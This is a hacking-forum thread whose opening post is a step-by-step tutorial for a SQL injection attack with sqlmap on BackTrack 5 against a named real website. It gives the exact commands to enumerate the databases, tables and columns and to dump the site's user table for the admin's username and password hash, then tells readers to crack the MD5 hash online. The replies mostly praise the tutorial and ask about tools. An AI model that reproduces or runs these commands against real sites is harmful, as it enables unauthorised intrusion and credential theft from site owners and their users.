Login Register
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


[Complete Package]SQL Injection Attack by BackTrack 5 filter_list
Author
Message
[Complete Package]SQL Injection Attack by BackTrack 5 #1
Hello Viewer, Now i am come again with my new thread. You like my old post Hack Facebook,Gmail,Yahoo and Twitter Account by BT5 so thanks for it. Now i am going to write my new tutorial in Backtrack Series.

I think you would know or hear about SQL Injection, IF you say "YES" so it's is good or else you say "NO" so please read about it by my old post...

Complete SQL Injection Attacks With Pics

Hack Website By Havij


I think my old tutorial is too good and also very helpful for a Newbie. Here i will going to tell you only How to Doing SQL INJECTION Attacks by BackTrack 5.

So Follow my steps and done it successfully!!!!



STEP1: Below pic show you a website which name is www.junincc.com.ar ,Now i am used my Backtrack Skill and find that website Admin name and password.


Spoiler:
[Image: 0.PNG]



STEP2: Open your BackTrack Terminal and Write "cd /pentest/web/scanners/sqlmap" and Hit Enter Key like below pic...


Spoiler:
[Image: 11.PNG]



STEP3: Now i am going to find out Website DataBase name,so for it write...


python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 --dbs

For Example see below pic...


Spoiler:
[Image: 12.PNG]



STEP4: When you done step 3 then you see after sometime processing a list of DataBase name come like below pic in which all name under RED color ring...


Spoiler:
[Image: 13.PNG]



Now choose any DataBase name for Forward Processing.In my case,i am select "junincc_junincc".


STEP5: After select DB name now write on forward step...


python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc --tables

i am write these command for find tables name under DataBase junincc_junincc see below pic...


Spoiler:
[Image: 14.PNG]




STEP6: When you have done step 5 then you see a list of tables come,In my case you see below pic where tables name in under of RED color ring....


Spoiler:
[Image: 15.PNG]



Now here i am select "usuarios" for find out columns name by Tables.



STEP7: For Find Columns name of any Table write below command...


python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc -T usuarios --columns

See below pic...


Spoiler:
[Image: 16.PNG]



STEP8: When you have done step 7 then you found a list of Table's columns,see below pic all columns name in table usuarios write in RED color ring...


Spoiler:
[Image: 17.PNG]



Here i am select two Columns name for future work which name is " clave , usuario " .



STEP9: Now i am going to find about columns information which save in column "clave , usuario" ,so run these command......

python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc -T usuarios -C clave,usuario --dump


See below pic...

Spoiler:
[Image: 18.PNG]



STEP10: When you run step 9 command then in some steps it ask for forward processing show you write "Y" and press ENTER KEY,see below pic...


Spoiler:
[Image: 19.PNG]



STEP11: Wait for some time then you see result like below pic...


Spoiler:
[Image: 20.PNG]




Here "admin" is the ADMIN account ID Name and password encrypt in MD5 ,For Decrypt it go to online MD5 Decryption Website and Decrypt the Password of Admin site.


I hope u will be successful in your work,so all the BEST!







http://www.hackarde.com/2012/03/sql-inje...ack-5.html

1010011001111010010010101
0110G10H10O101S010T10101
1010100010100100101001001



Reply

RE: [Complete Package]SQL Injection Attack by BackTrack 5 #2
Looks pretty good! :lol:
If you're cool click this: http://adf.ly/MWQtY

My newly created blog: http://www.learn-basic-hacking.blogspot.dk/

Reply

RE: [Complete Package]SQL Injection Attack by BackTrack 5 #3
simply and nice explained…nice tut
Grades doesn't measure intelligence and age doesn't define maturity

Reply

RE: [Complete Package]SQL Injection Attack by BackTrack 5 #4
(03-11-2012, 09:30 PM)drake8 Wrote: Looks pretty good! :lol:
Oh thanks bro for like my work done ,after try tell me ur experiance.

1010011001111010010010101
0110G10H10O101S010T10101
1010100010100100101001001



Reply

RE: [Complete Package]SQL Injection Attack by BackTrack 5 #5
only linux ,,,sir Biggrin....

i can crack SQL inject

Reply

RE: [Complete Package]SQL Injection Attack by BackTrack 5 #6
very nice job hrde!Keep the good job! ;-)
[Image: T4OUWZ1.png]


Reply

RE: [Complete Package]SQL Injection Attack by BackTrack 5 #7
good..and you can also use sqlmap on windows Wink
[Image: Capture.png]

Reply

RE: [Complete Package]SQL Injection Attack by BackTrack 5 #8
btw, does there's any "lighter" version of backtrack? just to remind you, backtrack is nearly 5GB, which required a lot of bandwith to use (which i don't have)...
[Image: ap8g35.jpg]

Reply

RE: [Complete Package]SQL Injection Attack by BackTrack 5 #9
(03-26-2012, 05:23 PM)chipp Wrote: btw, does there's any "lighter" version of backtrack? just to remind you, backtrack is nearly 5GB, which required a lot of bandwith to use (which i don't have)...

Bro , Backtrack 5 R1 only 1.9 GB not 5 GB , you can also use virtual box for install it.

1010011001111010010010101
0110G10H10O101S010T10101
1010100010100100101001001



Reply

RE: [Complete Package]SQL Injection Attack by BackTrack 5 #10
is it easy to use ? can u explain ?

Reply







Users browsing this thread: 1 Guest(s)